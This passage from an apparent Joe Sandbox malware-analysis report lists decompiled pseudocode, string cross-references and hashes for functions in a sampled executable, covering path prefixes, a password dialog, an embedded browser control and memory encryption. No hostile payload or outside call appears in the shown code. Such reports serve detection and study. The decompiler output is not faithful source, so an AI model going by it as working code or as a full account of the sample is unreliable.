								if(__eflags != 0) {
									_t71 =  &(_t71[2]);
									__eflags = _t71;
								}
							}
							L19:
							_push(_t69);
							L20:
							_push(_t71);
							L21:
							_push(_a8);
							E00E70109(__eflags);
							_t33 = 1;
							goto L23;
						}
						_t13 = _t66 + 6; // 0x6
						_t69 = _a12;
						__eflags = _t69 - _t13;
						if(_t69 <= _t13) {
							goto L22;
						}
						E00E70131(_a8, L"\\\\?\\", _t69);
						_v4096 = 0;
						E00E70109(__eflags, _a8,  &_v4100, _t69);
						goto L19;
					}
					_t52 = E00E6B9F6(_t71);
					__eflags = _t52;
					if(_t52 == 0) {
						_t53 = 0x5c;
						__eflags =  *_t71 - _t53;
						if( *_t71 != _t53) {
							goto L22;
						}
						_t62 =  &(_t71[1]);
						__eflags =  *_t62 - _t53;
						if( *_t62 != _t53) {
							goto L22;
						}
						_t73 = _a12;
						_t9 = _t66 + 6; // 0x6
						__eflags = _t73 - _t9;
						if(_t73 <= _t9) {
							goto L22;
						}
						E00E70131(_a8, L"\\\\?\\", _t73);
						E00E70109(__eflags, _a8, L"UNC", _t73);
						_push(_t73);
						_push(_t62);
						goto L21;
					}
					_t2 = _t66 + 4; // 0x4
					__eflags = _a12 - _t2;
					if(_a12 <= _t2) {
						goto L22;
					}
					E00E70131(_a8, L"\\\\?\\", _a12);
					_push(_a12);
					goto L20;
				} else {
					_t33 = 0;
					L24:
					return _t33;
				}
			}

0x00e6b864
0x00e6b86a
0x00e6b871
0x00e6b87d
0x00e6b88a
0x00e6b88c
0x00e6b891
0x00e6b893
0x00e6b919
0x00e6b91f
0x00e6b921
0x00e6b9e0
0x00e6b9e0
0x00e6b9e0
0x00e6b9e2
0x00000000
0x00e6b9e3
0x00e6b927
0x00e6b929
0x00000000
0x00000000
0x00e6b938
0x00e6b93a
0x00e6b97f
0x00e6b98b
0x00e6b995
0x00e6b999
0x00e6b99b
0x00000000
0x00000000
0x00e6b9a6
0x00e6b9b6
0x00e6b9bb
0x00e6b9bf
0x00e6b9cb
0x00e6b9cd
0x00e6b9cf
0x00e6b9cf
0x00e6b9cf
0x00e6b9cd
0x00e6b9d2
0x00e6b9d2
0x00e6b9d3
0x00e6b9d3
0x00e6b9d4
0x00e6b9d4
0x00e6b9d7
0x00e6b9dc
0x00000000
0x00e6b9dc
0x00e6b93c
0x00e6b93f
0x00e6b942
0x00e6b944
0x00000000
0x00000000
0x00e6b953
0x00e6b95a
0x00e6b96c
0x00000000
0x00e6b96c
0x00e6b896
0x00e6b89b
0x00e6b89d
0x00e6b8c5
0x00e6b8c6
0x00e6b8c9
0x00000000
0x00000000
0x00e6b8cf
0x00e6b8d2
0x00e6b8d5
0x00000000
0x00000000
0x00e6b8db
0x00e6b8de
0x00e6b8e1
0x00e6b8e3
0x00000000
0x00000000
0x00e6b8f2
0x00e6b900
0x00e6b905
0x00e6b906
0x00000000
0x00e6b906
0x00e6b89f
0x00e6b8a2
0x00e6b8a5
0x00000000
0x00000000
0x00e6b8b6
0x00e6b8bb
0x00000000
0x00e6b873
0x00e6b873
0x00e6b9e4
0x00e6b9e8
0x00e6b9e8

Strings

\\?\, xrefs: 00E6B8AE, 00E6B8EA, 00E6B94B, 00E6B99E
UNC, xrefs: 00E6B8F8

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 42eb848596aa77aa82805175072a61941936c864c6500d89b492b7bbd23b647a
Instruction ID: 4a00a49ca162b78689194f9cd44b28cd6927a0a81f76fcb903830ee833490dea
Opcode Fuzzy Hash: 42eb848596aa77aa82805175072a61941936c864c6500d89b492b7bbd23b647a
Instruction Fuzzy Hash: 4F419031580219BACF21AF61EC42EEE77ADAF843D4B10A026F958F3141E770DE91C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00E74471 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00E74471(void* __ecx, void* __edx) {
				void* __edi;
				signed int _t57;
				intOrPtr _t59;
				void* _t61;
				intOrPtr _t69;
				short* _t77;
				void* _t80;
				void* _t83;
				short* _t89;
				signed int _t90;
				void* _t95;
				char _t101;
				signed int _t106;
				void* _t107;
				char _t108;
				short* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				char _t115;
				void* _t118;
				void* _t119;
				void* _t121;
				signed short* _t125;
				void* _t127;
				void* _t128;
				void* _t129;

				_t107 = __edx;
				_t128 = _t127 - 0x18;
				_push(_t111);
				_t118 = __ecx;
				 *((intOrPtr*)(_t128 + 0x20)) = 0;
				E00E7F5F0(_t111, __ecx + 0x66c, 0, 0x100);
				_t129 = _t128 + 0xc;
				_t112 = _t118 + 0x4a8c;
				E00E731CF(_t107);
				_t57 =  *(_t118 + 0x660);
				if(_t57 >= 0xc) {
					_t57 = 0xc;
				}
				 *(_t118 + 0x668) =  !_t57;
				_t59 = E00E72472(_t112);
				 *((intOrPtr*)(_t118 + 0x64c)) = _t59;
				 *((intOrPtr*)(_t118 + 0x644)) = _t59;
				if(_t59 == 0) {
					_t95 = _t129 + 0x1c;
					E00E71D08(_t95);
					_push(0xe9b704);
					_t61 = _t129 + 0x20;
					goto L19;
				} else {
					 *((intOrPtr*)(_t59 + 8)) = 0;
					 *(_t118 + 0x65c) =  *(_t118 + 0x660);
					 *((short*)( *((intOrPtr*)(_t118 + 0x644)))) = 0x100;
					 *((short*)( *((intOrPtr*)(_t118 + 0x644)) + 2)) = 0x101;
					_t69 = E00E724A7(_t112, 0x80);
					 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x644)) + 4)) = _t69;
					 *((intOrPtr*)(_t118 + 0x650)) = _t69;
					if(_t69 != 0) {
						_t108 = 0;
						 *(_t118 + 0x664) =  *(_t118 + 0x668);
						_t101 = 0;
						 *((char*)(_t118 + 0xa6d)) = 0;
						do {
							 *((char*)(_t101 +  *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x644)) + 4)))) = _t108;
							_t108 = _t108 + 1;
							 *((char*)( *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x644)) + 4)) + _t101 + 1)) = 1;
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x644)) + 4)) + _t101 + 2)) = 0;
							_t101 = _t101 + 6;
						} while (_t101 < 0x600);
						_t77 = _t118 + 0xa70;
						_t115 = 0;
						 *((intOrPtr*)(_t129 + 0x10)) = _t77;
						do {
							_t125 = 0xe94348;
							_t89 = _t77;
							do {
								_t35 = _t115 + 2; // 0x2
								asm("cdq");
								 *(_t129 + 0x18) = ( *_t125 & 0x0000ffff) / _t35;
								_t110 = _t89;
								_t80 = 8;
								do {
									 *_t110 = 0x4000 -  *((intOrPtr*)(_t129 + 0x14));
									_t110 = _t110 + 0x10;
									_t80 = _t80 - 1;
								} while (_t80 != 0);
								_t125 =  &(_t125[1]);
								_t89 = _t89 + 2;
							} while (_t125 < 0xe94358);
							_t115 = _t115 + 1;
							_t77 =  *((intOrPtr*)(_t129 + 0x10)) + 0x80;
							 *((intOrPtr*)(_t129 + 0x10)) = _t77;
						} while (_t115 < 0x80);
						_t90 =  *(_t129 + 0x18);
						_t121 = _t118 + 3;
						do {
							_t106 = (_t90 + 2) * 0x28;
							_t83 = 0x10;
							do {
								 *((short*)(_t121 - 1)) = 0x403;
								 *(_t121 - 3) = _t106;
								_t121 = _t121 + 4;
								_t83 = _t83 - 1;
							} while (_t83 != 0);
							_t90 = _t90 + 1;
						} while (_t90 < 0x19);
						return _t83;
					} else {
						_t95 = _t129 + 0x1c;
						E00E71D08(_t95);
						_push(0xe9b704);
						_t61 = _t129 + 0x20;
						L19:
						_push(_t61);
						E00E818C8();
						asm("int3");
						_push(0);
						_push(_t118);
						_push(_t112);
						_t113 = _t95;
						_t87 = _t113 + 0x98d8;
						_t119 = E00E728E7(_t113 + 0x98d8);
						if(_t119 == 0xffffffff) {
							E00E726E8(_t87, _t107);
							 *(_t113 + 0xe65c) =  *(_t113 + 0xe65c) & 0x00000000;
						}
						return _t119;
					}
				}
			}

0x00e74471
0x00e74471
0x00e74477
0x00e74478
0x00e74489
0x00e7448e
0x00e74493
0x00e74496
0x00e7449e
0x00e744a3
0x00e744ac
0x00e744b0
0x00e744b0
0x00e744b5
0x00e744bb
0x00e744c0
0x00e744c6
0x00e744ce
0x00e74606
0x00e7460a
0x00e7460f
0x00e74614
0x00000000
0x00e744d4
0x00e744d4
0x00e744e2
0x00e744f3
0x00e744fc
0x00e74502
0x00e7450d
0x00e74510
0x00e74518
0x00e74537
0x00e74539
0x00e7453f
0x00e74541
0x00e74547
0x00e74550
0x00e74553
0x00e7455d
0x00e7456b
0x00e7456f
0x00e74572
0x00e7457a
0x00e74580
0x00e74582
0x00e74586
0x00e74586
0x00e7458b
0x00e7458d
0x00e74591
0x00e74594
0x00e74599
0x00e7459d
0x00e7459f
0x00e745a0
0x00e745a9
0x00e745ac
0x00e745af
0x00e745af
0x00e745b4
0x00e745b7
0x00e745ba
0x00e745cb
0x00e745cc
0x00e745ce
0x00e745d2
0x00e745d6
0x00e745da
0x00e745dd
0x00e745e2
0x00e745e5
0x00e745e6
0x00e745e6
0x00e745ec
0x00e745f0
0x00e745f3
0x00e745f3
0x00e745f8
0x00e745f9
0x00e74605
0x00e7451a
0x00e7451a
0x00e7451e
0x00e74523
0x00e74528
0x00e74618
0x00e74618
0x00e74619
0x00e7461e
0x00e7461f
0x00e74620
0x00e74621
0x00e74622
0x00e74624
0x00e74631
0x00e74636
0x00e7463a
0x00e7463f
0x00e7463f
0x00e7464b
0x00e7464b
0x00e74518

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00E74619

Strings

XC, xrefs: 00E745BA
HC, xrefs: 00E74586

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Exception@8Throw
String ID: HC$XC
API String ID: 2005118841-2964754326
Opcode ID: 2f7f81663c00efad935c81cf693f8aa5d6999b8ade83db25cccb5003c896de50
Instruction ID: d786cf5012ba34c6c26d5c0e16105cc36fc7d44627098f48294898d0388dbc9c
Opcode Fuzzy Hash: 2f7f81663c00efad935c81cf693f8aa5d6999b8ade83db25cccb5003c896de50
Instruction Fuzzy Hash: 6E416FB06007008FD714DF28D881B6AB7E5FF99304F44992DE59ED7391EB72E9088B41

Uniqueness

Uniqueness Score: -1.00%

Function 00E791F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00E791F6(void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v4;
				signed int* _v20;
				void* __ecx;
				void* __esi;
				intOrPtr _t21;
				char _t22;
				signed int* _t26;
				intOrPtr* _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t50;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t58;

				_t50 = __edi;
				_t34 = _t35;
				_t53 = _a4;
				 *((intOrPtr*)(_t34 + 4)) = _t53;
				_t21 = E00E7E512(__edx, _t53, __eflags, 0x30);
				_v4 = _t21;
				if(_t21 == 0) {
					_t22 = 0;
					__eflags = 0;
				} else {
					_t22 = E00E78A2E(_t21);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t22;
				if(_t22 == 0) {
					return _t22;
				} else {
					 *((intOrPtr*)(_t22 + 0x18)) = _t53;
					E00E79A6F( *((intOrPtr*)(_t34 + 0xc)), L"Shell.Explorer");
					_push(1);
					E00E79CCE();
					E00E79C64( *((intOrPtr*)(_t34 + 0xc)), 1);
					_t26 = E00E79B61( *((intOrPtr*)(_t34 + 0xc)));
					_t58 = _t26;
					if(_t58 == 0) {
						L7:
						__eflags =  *((intOrPtr*)(_t34 + 0x10));
						if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
							E00E78C46(_t34);
							_t28 =  *((intOrPtr*)(_t34 + 0x10));
							__eflags =  *((intOrPtr*)(_t34 + 0x20));
							_push(0);
							 *((char*)(_t34 + 0x25)) = 0;
							_t54 =  *_t28;
							_push(0);
							_push(0);
							_push(0);
							if( *((intOrPtr*)(_t34 + 0x20)) == 0) {
								_push(L"about:blank");
							} else {
								_push( *((intOrPtr*)(_t34 + 0x20)));
							}
							 *0xe93260(_t28);
							_t26 =  *((intOrPtr*)(_t54 + 0x2c))();
						}
						L12:
						return _t26;
					}
					_t10 = _t34 + 0x10; // 0x10
					_t30 = _t10;
					_v4 = _t30;
					 *0xe93260(_t58, 0xe9541c, _t30, _t50);
					_t32 =  *((intOrPtr*)( *( *_t58)))();
					 *0xe93260(_t58);
					_t26 =  *((intOrPtr*)( *((intOrPtr*)( *_t58 + 8))))();
					if(_t32 >= 0) {
						goto L7;
					}
					_t26 = _v20;
					 *_t26 =  *_t26 & 0x00000000;
					goto L12;
				}
			}

0x00e791f6
0x00e791f8
0x00e791fb
0x00e79201
0x00e79204
0x00e79209
0x00e79210
0x00e7921b
0x00e7921b
0x00e79212
0x00e79214
0x00e79214
0x00e7921d
0x00e79222
0x00e792d5
0x00e79228
0x00e79229
0x00e79234
0x00e7923c
0x00e7923e
0x00e79248
0x00e79250
0x00e79255
0x00e79259
0x00e7929a
0x00e7929a
0x00e7929e
0x00e792a2
0x00e792a7
0x00e792ac
0x00e792af
0x00e792b0
0x00e792b3
0x00e792b5
0x00e792b6
0x00e792b7
0x00e792bb
0x00e792c2
0x00e792bd
0x00e792bd
0x00e792bd
0x00e792c8
0x00e792ce
0x00e792ce
0x00e792d1
0x00000000
0x00e792d1
0x00e7925e
0x00e7925e
0x00e7926d
0x00e79271
0x00e79277
0x00e79284
0x00e7928a
0x00e7928f
0x00000000
0x00000000
0x00e79291
0x00e79295
0x00000000
0x00e79295

APIs

new.LIBCMT ref: 00E79204

Strings

Shell.Explorer, xrefs: 00E7922F
about:blank, xrefs: 00E792C2

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: beefa1b967b5fa26de7d6ea293c5bca3096ff850b8701c316d24c57a7575e902
Instruction ID: c798a5421e38b4a8e0615d101085899218b5ee1de499a1fc284660207a486730
Opcode Fuzzy Hash: beefa1b967b5fa26de7d6ea293c5bca3096ff850b8701c316d24c57a7575e902
Instruction Fuzzy Hash: F5214F71254344AFDB08AF64D895A6677E8FF44720B14D45AF80DAB297DA70EC01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D70A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00E7D70A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, void* _a16) {
				void* _v4100;
				void* __ebx;
				int _t18;
				void* _t20;
				signed int _t23;
				void* _t26;
				signed int _t29;
				signed int _t31;
				signed int _t33;
				struct HWND__* _t47;
				void* _t52;

				E00E7E630();
				if( *0xeac572 == 0) {
					_t47 =  *0xea8458; // 0x202b6
					if(_a4 == 2) {
						_t23 =  *0xec20b0(_t47);
						asm("sbb eax, eax");
						_t47 = _t47 &  ~_t23;
					}
					E00E6B806(_a8, _a12,  &_v4100, 0x800);
					_t18 = DialogBoxParamW( *0xea0ed4, L"GETPASSWORD1", _t47, E00E7AC20,  &_v4100);
					_t26 = _a16;
					if(_t18 == 0) {
						E00E6EF88(_t26, _t26, 0xe935b4);
						 *0xea8450 = 1;
						_t20 = 0;
					} else {
						_t31 = 0x40;
						memcpy(_t26, 0xeb6a78, _t31 << 2);
						_t52 = _t52 + 0xc;
						_t20 = 1;
						asm("movsw");
					}
					if( *((char*)(_t26 + 0x100)) != 0) {
						_t29 = 0x40;
						_t20 = memcpy(0xeac472, _t26, _t29 << 2);
						asm("movsw");
					}
				} else {
					_t33 = 0x40;
					_t20 = memcpy(_a16, 0xeac472, _t33 << 2);
					asm("movsw");
				}
				return _t20;
			}

0x00e7d712
0x00e7d723
0x00e7d73d
0x00e7d743
0x00e7d746
0x00e7d74e
0x00e7d750
0x00e7d750
0x00e7d765
0x00e7d782
0x00e7d788
0x00e7d78d
0x00e7d7a9
0x00e7d7ae
0x00e7d7b5
0x00e7d78f
0x00e7d791
0x00e7d799
0x00e7d799
0x00e7d79d
0x00e7d79e
0x00e7d79e
0x00e7d7be
0x00e7d7c2
0x00e7d7ca
0x00e7d7cc
0x00e7d7cc
0x00e7d725
0x00e7d72f
0x00e7d730
0x00e7d732
0x00e7d732
0x00e7d7d4

APIs

DialogBoxParamW.USER32(GETPASSWORD1,000202B6,00E7AC20,?,?), ref: 00E7D782

Strings

GETPASSWORD1, xrefs: 00E7D777
xj, xrefs: 00E7D792

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: DialogParam
String ID: GETPASSWORD1$xj
API String ID: 665744214-2429949757
Opcode ID: 73fb08ee6bac7c93cbe66ff3c1790d80fb9dea1c214017fafdf7037e2259eb07
Instruction ID: 3df4a30b9d0ef13d61963826cd0f011ca5ac6e124f4269a5a86e472b1642d83e
Opcode Fuzzy Hash: 73fb08ee6bac7c93cbe66ff3c1790d80fb9dea1c214017fafdf7037e2259eb07
Instruction Fuzzy Hash: A6113B316042446FEB25DE359C42BAB37E8BB0E754F149076FE4DBB180C6B16C84D390

Uniqueness

Uniqueness Score: -1.00%

Function 00E6EECD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00E6EE4E: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00E6EE6D
Part of subcall function 00E6EE4E: GetProcAddress.KERNEL32(00EA81C0,CryptUnprotectMemory), ref: 00E6EE7D

GetCurrentProcessId.KERNEL32(?,?,?,00E6EEC7), ref: 00E6EF5F

Strings

CryptUnprotectMemory failed, xrefs: 00E6EF57
CryptProtectMemory failed, xrefs: 00E6EF16

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 881feed54507578640bf7409eaefeeda53f2e492b688f4def6d282ce7da88f8d
Instruction ID: 1e480ad7ae02f80a7e22b62fe367681227a15a2a9ebb315b6166dae508e361fb
Opcode Fuzzy Hash: 881feed54507578640bf7409eaefeeda53f2e492b688f4def6d282ce7da88f8d
Instruction Fuzzy Hash: BC115935B49224AFDB219B31FC0666E3B55EF157A8B04500AF8017B3D1CB326E0187D0

Uniqueness

Uniqueness Score: -1.00%

Function 00E89EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E89EA0(signed int __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t23 = __ecx;
				_t9 =  *0xec127c; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0xec127c = _t9;
				}
				 *0xec1280 = E00E888C9(_t23, _t9, 4);
				E00E887FE(0);
				if( *0xec1280 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0xe9e6b0;
					do {
						_t1 = _t31 + 0x20; // 0xe9e6d0
						E00E8A9DA(_t23, _t31, __eflags, _t1, 0xfa0, 0);
						_t14 =  *0xec1280; // 0x0
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t23 = (_t28 & 0x0000003f) * 0x30;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0xec1298 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x30));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0xe9e758;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0xec127c = _t30;
					 *0xec1280 = E00E888C9(_t23, _t30, 4);
					_t21 = E00E887FE(0);
					if( *0xec1280 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x00e89ea0
0x00e89ea0
0x00e89ea8
0x00e89eab
0x00e89eb4
0x00e89eb6
0x00e89eb8
0x00000000
0x00e89eb8
0x00e89ead
0x00e89ead
0x00e89eba
0x00e89eba
0x00e89eba
0x00e89ec9
0x00e89ece
0x00e89edd
0x00e89f0a
0x00e89f0b
0x00e89f0b
0x00e89f0d
0x00e89f12
0x00e89f19
0x00e89f1d
0x00e89f22
0x00e89f2c
0x00e89f34
0x00e89f3e
0x00e89f42
0x00e89f45
0x00e89f50
0x00e89f50
0x00e89f47
0x00e89f47
0x00e89f4a
0x00000000
0x00e89f4c
0x00e89f4c
0x00e89f4e
0x00000000
0x00000000
0x00e89f4e
0x00e89f4a
0x00e89f57
0x00e89f5a
0x00e89f5b
0x00e89f5b
0x00e89f64
0x00e89f67
0x00e89edf
0x00e89ee2
0x00e89eef
0x00e89ef4
0x00e89f03
0x00000000
0x00e89f05
0x00e89f09
0x00e89f09
0x00e89f03

APIs

_free.LIBCMT ref: 00E89ECE
_free.LIBCMT ref: 00E89EF4

Strings

X, xrefs: 00E89F5B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: _free
String ID: X
API String ID: 269201875-1677210272
Opcode ID: 3711b29ed30c5f2c4515848c64b40397bfcee5e8f3a893efa14202788e817d9e
Instruction ID: 179c2a3585bf6c964c8192febb616a40036ee571f47f4d25c163235eef4c07c7
Opcode Fuzzy Hash: 3711b29ed30c5f2c4515848c64b40397bfcee5e8f3a893efa14202788e817d9e
Instruction Fuzzy Hash: 9211B436E003019EEB28AB79AC05F6536D4A741324F182676F62DFB2E2E771C8465784

Uniqueness

Uniqueness Score: -1.00%

Function 00E7EEFA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E7F4FE
___raise_securityfailure.LIBCMT ref: 00E7F5E5

Strings

8, xrefs: 00E7F5E0

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 8
API String ID: 3761405300-3509204572
Opcode ID: 187f43e414af3ebeaf351590b8104ed12b00e6df455a1c202ded1ab96dae1cca
Instruction ID: 135a7377118345c04a58810722ab3b4c6ef8ca5aaa28351781fe3d7fb0a2cf2a
Opcode Fuzzy Hash: 187f43e414af3ebeaf351590b8104ed12b00e6df455a1c202ded1ab96dae1cca
Instruction Fuzzy Hash: 8D2104B5590304DFDB10DF96F985E503BE4BB48324F10583AE909AB3A1E3F2698ACF45

Uniqueness

Uniqueness Score: -1.00%

Function 00E61241 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32(?), ref: 00E6124E

Strings

A, xrefs: 00E6127B

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Malloc
String ID: A
API String ID: 2696272793-3554254475
